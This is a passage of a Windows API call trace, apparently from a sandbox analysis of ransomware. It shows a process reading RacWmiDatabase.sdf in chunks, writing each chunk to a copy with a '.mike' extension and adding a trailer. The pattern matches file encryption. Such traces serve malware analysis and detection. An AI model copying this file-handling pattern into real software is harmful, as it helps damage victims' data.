lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0xf220 [0138.503] WriteFile (in: hFile=0x280, lpBuffer=0x21675f4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21675f4*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0138.503] CloseHandle (hObject=0x280) returned 1 [0138.503] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x0) returned 0x3d [0138.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.503] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.503] GetFileType (hFile=0x280) returned 0x1 [0138.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.503] GetFileType (hFile=0x280) returned 0x1 [0138.503] SetFilePointer (in: hFile=0x280, lDistanceToMove=71680, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x11800 [0138.503] ReadFile (in: hFile=0x280, lpBuffer=0x216a044, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x216a044*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0138.504] CloseHandle (hObject=0x280) returned 1 [0138.504] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", lpFilePart=0x0) returned 0x42 [0138.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.504] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.504] GetFileType (hFile=0x280) returned 0x1 [0138.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.505] GetFileType (hFile=0x280) returned 0x1 [0138.505] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x11a20 [0138.505] WriteFile (in: hFile=0x280, lpBuffer=0x21745ac*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21745ac*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0138.505] CloseHandle (hObject=0x280) returned 1 [0138.505] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x0) returned 0x3d [0138.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.505] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.505] GetFileType (hFile=0x280) returned 0x1 [0138.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.505] GetFileType (hFile=0x280) returned 0x1 [0138.505] SetFilePointer (in: hFile=0x280, lDistanceToMove=81920, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x14000 [0138.506] ReadFile (in: hFile=0x280, lpBuffer=0x2176ffc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2176ffc*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0138.506] CloseHandle (hObject=0x280) returned 1 [0138.506] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", lpFilePart=0x0) returned 0x42 [0138.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.506] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.506] GetFileType (hFile=0x280) returned 0x1 [0138.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.507] GetFileType (hFile=0x280) returned 0x1 [0138.507] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x14220 [0138.507] WriteFile (in: hFile=0x280, lpBuffer=0x2181564*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2181564*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0138.507] CloseHandle (hObject=0x280) returned 1 [0138.507] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x0) returned 0x3d [0138.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.507] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.507] GetFileType (hFile=0x280) returned 0x1 [0138.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.507] GetFileType (hFile=0x280) returned 0x1 [0138.507] SetFilePointer (in: hFile=0x280, lDistanceToMove=92160, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x16800 [0138.507] ReadFile (in: hFile=0x280, lpBuffer=0x2183fb4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2183fb4*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0138.508] CloseHandle (hObject=0x280) returned 1 [0138.508] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", lpFilePart=0x0) returned 0x42 [0138.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.508] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.508] GetFileType (hFile=0x280) returned 0x1 [0138.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.509] GetFileType (hFile=0x280) returned 0x1 [0138.509] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x16a20 [0138.509] WriteFile (in: hFile=0x280, lpBuffer=0x218e51c*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x218e51c*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0138.509] CloseHandle (hObject=0x280) returned 1 [0138.509] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x0) returned 0x3d [0138.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.509] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.509] GetFileType (hFile=0x280) returned 0x1 [0138.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.509] GetFileType (hFile=0x280) returned 0x1 [0138.509] SetFilePointer (in: hFile=0x280, lDistanceToMove=102400, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x19000 [0138.509] ReadFile (in: hFile=0x280, lpBuffer=0x2190f6c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2190f6c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0138.510] CloseHandle (hObject=0x280) returned 1 [0138.510] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", lpFilePart=0x0) returned 0x42 [0138.510] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.510] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.510] GetFileType (hFile=0x280) returned 0x1 [0138.510] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.511] GetFileType (hFile=0x280) returned 0x1 [0138.511] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x19220 [0138.511] WriteFile (in: hFile=0x280, lpBuffer=0x219b4d4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x219b4d4*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0138.511] CloseHandle (hObject=0x280) returned 1 [0138.511] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x0) returned 0x3d [0138.511] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.511] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.511] GetFileType (hFile=0x280) returned 0x1 [0138.511] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.511] GetFileType (hFile=0x280) returned 0x1 [0138.511] SetFilePointer (in: hFile=0x280, lDistanceToMove=112640, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1b800 [0138.511] ReadFile (in: hFile=0x280, lpBuffer=0x219df24, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x219df24*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0138.512] CloseHandle (hObject=0x280) returned 1 [0138.512] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", lpFilePart=0x0) returned 0x42 [0138.512] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.512] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.512] GetFileType (hFile=0x280) returned 0x1 [0138.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.512] GetFileType (hFile=0x280) returned 0x1 [0138.512] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x1ba20 [0138.513] WriteFile (in: hFile=0x280, lpBuffer=0x21a848c*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21a848c*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0138.513] CloseHandle (hObject=0x280) returned 1 [0138.513] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x0) returned 0x3d [0138.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.513] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.513] GetFileType (hFile=0x280) returned 0x1 [0138.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.513] GetFileType (hFile=0x280) returned 0x1 [0138.513] SetFilePointer (in: hFile=0x280, lDistanceToMove=122880, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1e000 [0138.513] ReadFile (in: hFile=0x280, lpBuffer=0x21aaedc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21aaedc*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0138.514] CloseHandle (hObject=0x280) returned 1 [0138.514] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", lpFilePart=0x0) returned 0x42 [0138.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.514] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.517] GetFileType (hFile=0x280) returned 0x1 [0138.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.517] GetFileType (hFile=0x280) returned 0x1 [0138.517] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x1e220 [0138.517] WriteFile (in: hFile=0x280, lpBuffer=0x21b5444*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21b5444*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0138.517] CloseHandle (hObject=0x280) returned 1 [0138.517] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x0) returned 0x3d [0138.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.517] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.517] GetFileType (hFile=0x280) returned 0x1 [0138.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.518] GetFileType (hFile=0x280) returned 0x1 [0138.518] SetFilePointer (in: hFile=0x280, lDistanceToMove=133120, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x20800 [0138.518] ReadFile (in: hFile=0x280, lpBuffer=0x21b7e94, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21b7e94*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0138.518] CloseHandle (hObject=0x280) returned 1 [0138.518] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", lpFilePart=0x0) returned 0x42 [0138.518] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.518] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.519] GetFileType (hFile=0x280) returned 0x1 [0138.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.519] GetFileType (hFile=0x280) returned 0x1 [0138.519] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x20a20 [0138.519] WriteFile (in: hFile=0x280, lpBuffer=0x21c23fc*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21c23fc*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0138.519] CloseHandle (hObject=0x280) returned 1 [0138.519] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x0) returned 0x3d [0138.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.519] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.519] GetFileType (hFile=0x280) returned 0x1 [0138.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.520] GetFileType (hFile=0x280) returned 0x1 [0138.520] SetFilePointer (in: hFile=0x280, lDistanceToMove=143360, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x23000 [0138.520] ReadFile (in: hFile=0x280, lpBuffer=0x21c4e4c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21c4e4c*, lpNumberOfBytesRead=0x2af0c8*=0x2000, lpOverlapped=0x0) returned 1 [0138.520] CloseHandle (hObject=0x280) returned 1 [0138.520] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", lpFilePart=0x0) returned 0x42 [0138.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.521] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.521] GetFileType (hFile=0x280) returned 0x1 [0138.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.521] GetFileType (hFile=0x280) returned 0x1 [0138.521] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x23220 [0138.521] WriteFile (in: hFile=0x280, lpBuffer=0x21cdbb4*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21cdbb4*, lpNumberOfBytesWritten=0x2af0dc*=0x2000, lpOverlapped=0x0) returned 1 [0138.521] CloseHandle (hObject=0x280) returned 1 [0138.521] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", lpFilePart=0x0) returned 0x42 [0138.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0138.521] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.521] GetFileType (hFile=0x280) returned 0x1 [0138.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0138.521] GetFileType (hFile=0x280) returned 0x1 [0138.523] WriteFile (in: hFile=0x280, lpBuffer=0x21d1f04*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21d1f04*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0138.523] CloseHandle (hObject=0x280) returned 1 [0138.523] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x0) returned 0x3d [0138.523] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", lpFilePart=0x0) returned 0x42 [0138.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0138.523] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1bd485c0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1bd485c0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1bd94880, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x25220)) returned 1 [0138.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0138.523] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: 